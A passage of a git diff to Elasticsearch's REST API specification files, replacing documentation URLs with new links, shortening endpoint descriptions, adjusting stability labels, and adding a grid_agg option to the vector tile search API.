+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-post-behavioral-analytics-event", + "description": "Create a behavioral analytics collection event" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json index b20df20bd234e..bd23a599f8abe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put.json @@ -1,10 +1,10 @@ { "search_application.put": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-search-application.html", - "description": "Creates or updates a search application." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put", + "description": "Create or update a search application" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json index 811791dd586dd..cc8963ca08c23 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.put_behavioral_analytics.json @@ -1,8 +1,8 @@ { "search_application.put_behavioral_analytics": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-analytics-collection.html", - "description": "Creates a behavioral analytics collection." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put-behavioral-analytics", + "description": "Create a behavioral analytics collection" }, "stability": "experimental", "deprecated": { diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json index 5aece1b626898..2769e88d3161d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.render_query.json @@ -1,8 +1,8 @@ { "search_application.render_query": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/search-application-render-query.html", - "description": "Renders a query for given search application search parameters" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-render-query", + "description": "Render a search application query" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json index d0a8d36d9b46d..37cef5c37c340 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.search.json @@ -1,10 +1,10 @@ { "search_application.search": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/search-application-search.html", - "description": "Perform a search against a search application" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-search", + "description": "Run a search application search" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json index 35ebe3b3f1d16..b6df801f96f2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_mvt.json @@ -1,10 +1,10 @@ { "search_mvt": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/search-vector-tile-api.html", - "description": "Searches a vector tile for geospatial values. Returns results as a binary Mapbox vector tile." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-mvt", + "description": "Search a vector tile" }, - "stability": "experimental", + "stability": "stable", "visibility": "public", "headers": { "accept": [ @@ -73,6 +73,15 @@ "description":"Determines the geometry type for features in the aggs layer.", "default":"grid" }, + "grid_agg":{ + "type":"enum", + "options":[ + "geotile", + "geohex" + ], + "description":"Aggregation used to create a grid for `field`.", + "default":"geotile" + }, "size":{ "type":"int", "description":"Maximum number of features to return in the hits layer. 
Accepts 0-10000.", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json index 8e80cd15d9ea2..d55e24837c0b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_shards.json @@ -1,8 +1,8 @@ { "search_shards":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-shards.html", - "description":"Returns information about the indices and shards that a search request would be executed against." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-shards", + "description":"Get the search shards" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json index 22a2a8367bc17..5dabae85f7760 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_template.json @@ -1,8 +1,8 @@ { "search_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html", - "description":"Allows to use the Mustache language to pre-render a search definition." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-template", + "description":"Run a search with a search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json index 3cfb71bb11e14..0a0413500b40e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.cache_stats.json @@ -1,8 +1,8 @@ { "searchable_snapshots.cache_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-apis.html", - "description": "Retrieve node-level cache statistics about searchable snapshots." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-cache-stats", + "description": "Get cache statistics" }, "stability": "experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json index d2d7000195c04..f599bf736a488 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.clear_cache.json @@ -1,7 +1,7 @@ { "searchable_snapshots.clear_cache": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-apis.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-clear-cache", "description" : "Clear the cache of searchable snapshots." 
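The grid_agg parameter added to search_mvt above selects how the aggs layer is gridded: geotile by default, geohex as the new alternative. A sketch fetching one tile, with size kept inside the 0-10000 range noted above; the index name and geo field are assumptions:

    import requests

    # zoom/x/y address a single tile; the response body is a binary Mapbox vector tile.
    resp = requests.post(
        "http://localhost:9200/museums/_mvt/location/2/1/1",
        params={"grid_agg": "geohex", "grid_precision": 6, "size": 1000},
        json={"query": {"term": {"type": "museum"}}},
    )
    with open("tile_2_1_1.mvt", "wb") as f:
        f.write(resp.content)
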
}, "stability": "experimental", @@ -25,7 +25,7 @@ "parts": { "index": { "type": "list", - "description": "A comma-separated list of index names" + "description": "Clear the cache" } } } @@ -50,10 +50,6 @@ ], "default": "open", "description": "Whether to expand wildcard expression to concrete indices that are open, closed or both." - }, - "index": { - "type": "list", - "description": "A comma-separated list of index name to limit the operation" } } } diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json index b1a3893760a98..70d975a4b53d7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.mount.json @@ -1,8 +1,8 @@ { "searchable_snapshots.mount": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-api-mount-snapshot.html", - "description": "Mount a snapshot as a searchable index." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-mount", + "description": "Mount a snapshot" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json index 9c35e51c70636..612130cbb86c8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/searchable_snapshots.stats.json @@ -1,8 +1,8 @@ { "searchable_snapshots.stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/searchable-snapshots-apis.html", - "description": "Retrieve shard-level statistics about searchable snapshots." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-stats", + "description": "Get searchable snapshot statistics" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json index f03c79b876f80..8d5a5610b4328 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.activate_user_profile.json @@ -1,8 +1,8 @@ { "security.activate_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-activate-user-profile.html", - "description":"Creates or updates the user profile on behalf of another user." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-activate-user-profile", + "description":"Activate a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json index 3b65a7eebca10..15d41962f4616 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.authenticate.json @@ -1,8 +1,8 @@ { "security.authenticate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-authenticate.html", - "description":"Enables authentication as a user and retrieve information about the authenticated user." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-authenticate", + "description":"Authenticate a user" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json index 8810602aa2c18..2c562c9c4ab8d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_delete_role.json @@ -1,8 +1,8 @@ { "security.bulk_delete_role": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-bulk-delete-role.html", - "description": "Bulk delete roles in the native realm." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-bulk-delete-role", + "description": "Bulk delete roles" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json index f8916a48b31e6..fe8f54e104c2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_put_role.json @@ -1,8 +1,8 @@ { "security.bulk_put_role": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-bulk-put-role.html", - "description": "Bulk adds and updates roles in the native realm." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-bulk-put-role", + "description": "Bulk create or update roles" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json index 69d3255776f37..33dd038c38f60 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.bulk_update_api_keys.json @@ -1,8 +1,8 @@ { "security.bulk_update_api_keys": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-bulk-update-api-keys.html", - "description": "Updates the attributes of multiple existing API keys." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-bulk-update-api-keys", + "description": "Bulk update API keys" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json index c2b1391c1127d..6a5578118a007 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.change_password.json @@ -1,8 +1,8 @@ { "security.change_password":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-change-password.html", - "description":"Changes the passwords of users in the native realm and built-in users." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-change-password", + "description":"Change passwords" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json index 2f3ce2f27e071..1c9063affc2d3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_api_key_cache.json @@ -1,8 +1,8 @@ { "security.clear_api_key_cache":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-api-key-cache.html", - "description":"Clear a subset or all entries from the API key cache." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-api-key-cache", + "description":"Clear the API key cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json index f90fbf9c1b4dd..14edc27ad6ac2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_privileges.json @@ -1,8 +1,8 @@ { "security.clear_cached_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-privilege-cache.html", - "description":"Evicts application privileges from the native application privileges cache." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-privileges", + "description":"Clear the privileges cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json index 3b24c6ef423af..6221e0308fe85 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_realms.json @@ -1,8 +1,8 @@ { "security.clear_cached_realms":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-cache.html", - "description":"Evicts users from the user cache. Can completely clear the cache or evict specific users." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-realms", + "description":"Clear the user cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json index 64a0efe551212..cd0d93db0be60 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_roles.json @@ -1,8 +1,8 @@ { "security.clear_cached_roles":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-role-cache.html", - "description":"Evicts roles from the native role cache." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-roles", + "description":"Clear the roles cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json index 72c10d006569b..5481437841e2f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.clear_cached_service_tokens.json @@ -1,8 +1,8 @@ { "security.clear_cached_service_tokens":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-clear-service-token-caches.html", - "description":"Evicts tokens from the service account token caches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-clear-cached-service-tokens", + "description":"Clear service account token caches" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json index 31ab3993ce9c4..73e76154c06bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_api_key.json @@ -1,8 +1,8 @@ { "security.create_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-create-api-key.html", - "description":"Creates an API key for access without requiring basic authentication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-api-key", + "description":"Create an API key" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json index 88d6b97067492..179e85d2bc9bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_cross_cluster_api_key.json @@ -1,8 +1,8 @@ { "security.create_cross_cluster_api_key": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-create-cross-cluster-api-key.html", - "description": "Creates a cross-cluster API key for API key based remote cluster access." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key", + "description": "Create a cross-cluster API key" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json index 33bdf709fb7a2..fc531d714e2cf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.create_service_token.json @@ -1,8 +1,8 @@ { "security.create_service_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-create-service-token.html", - "description":"Creates a service account token for access without requiring basic authentication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-service-token", + "description":"Create a service account token" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json index 752ea35028b4f..f808d900033c2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delegate_pki.json @@ -1,8 +1,8 @@ { "security.delegate_pki": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-delegate-pki-authentication.html", - "description": "Delegate PKI authentication." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delegate-pki", + "description": "Delegate PKI authentication" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json index 533473743f02a..8b85099ad7a07 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json @@ -1,8 +1,8 @@ { "security.delete_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-privilege.html", - "description":"Removes application privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-privileges", + "description":"Delete application privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json index 65b2495f01995..abcb6c9ea54bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json @@ -1,8 +1,8 @@ { "security.delete_role":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-role.html", - "description":"Removes roles in the native realm." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-role", + "description":"Delete roles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json index ac73fb4d7ccbb..c19c283a475fa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json @@ -1,8 +1,8 @@ { "security.delete_role_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-role-mapping.html", - "description":"Removes role mappings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-role-mapping", + "description":"Delete role mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json index 4da3ec30b5ce7..0c24e6e3d22af 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json @@ -1,8 +1,8 @@ { "security.delete_service_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-service-token.html", - "description":"Deletes a service account token." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-service-token", + "description":"Delete service account tokens" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json index 2c7e1091a0e82..54e1bc07e0dbe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json @@ -1,8 +1,8 @@ { "security.delete_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-user.html", - "description":"Deletes users from the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-user", + "description":"Delete users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json index 0dead4d592d96..f7413181f27e0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json @@ -1,8 +1,8 @@ { "security.disable_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-disable-user.html", - "description":"Disables users in the native realm." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-disable-user", + "description":"Disable users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json index 77e8744f03056..0402d658c6852 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json @@ -1,8 +1,8 @@ { "security.disable_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-disable-user-profile.html", - "description":"Disables a user profile so it's not visible in user profile searches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-disable-user-profile", + "description":"Disable a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json index 6218a04c9ae06..565cab13de39e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json @@ -1,8 +1,8 @@ { "security.enable_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-enable-user.html", - "description":"Enables users in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enable-user", + "description":"Enable users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json index 1b42ec401440f..58b939042686f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json @@ -1,8 +1,8 @@ { "security.enable_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-enable-user-profile.html", - "description":"Enables a user profile so it's visible in user profile searches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enable-user-profile", + "description":"Enable a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json index b3e961d64df6e..49bd75777bd0c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json @@ -1,8 +1,8 @@ { "security.enroll_kibana":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-kibana-enrollment.html", - "description":"Allows a kibana instance to configure itself to communicate with a secured elasticsearch cluster." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enroll-kibana", + "description":"Enroll Kibana" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json index 17b88859033b4..f047ef728941c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json @@ -1,8 +1,8 @@ { "security.enroll_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-node-enrollment.html", - "description":"Allows a new node to enroll to an existing cluster with security enabled." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enroll-node", + "description":"Enroll a node" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json index 4df007a072bf1..679c60ce89291 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json @@ -1,8 +1,8 @@ { "security.get_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-api-key.html", - "description":"Retrieves information for one or more API keys." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-api-key", + "description":"Get API key information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json index 96ab86a613bad..f2fff0a5e8ccf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json @@ -1,8 +1,8 @@ { "security.get_builtin_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-builtin-privileges.html", - "description":"Retrieves the list of cluster privileges and index privileges that are available in this version of Elasticsearch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-builtin-privileges", + "description":"Get builtin privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json 